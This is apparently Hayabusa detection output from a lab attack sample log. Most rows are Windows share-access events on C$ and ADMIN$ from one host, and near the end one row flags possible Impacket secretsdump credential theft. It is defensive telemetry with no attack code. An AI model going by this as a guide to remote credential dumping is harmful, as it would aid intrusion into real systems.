IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.783 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.783 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.783 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.783 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.783 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.799 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.799 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.799 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.799 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.799 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.799 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.799 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.814 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | 
LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.814 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.814 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.834 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.834 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.834 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.834 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.834 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.834 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.848 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.850 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.850 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.850 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.850 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.850 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.850 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.850 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.866 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.866 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.866 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.866 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.866 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.866 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.881 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.881 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.881 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.881 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.881 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.881 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.897 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.897 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.897 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.897 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.897 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.897 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.912 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.912 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.912 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc\hosts | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.912 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.912 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.912 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.928 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.928 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc\hosts | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.928 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.928 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.944 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.944 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\XwYybEmH.tmp | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.944 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.944 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.944 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.959 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
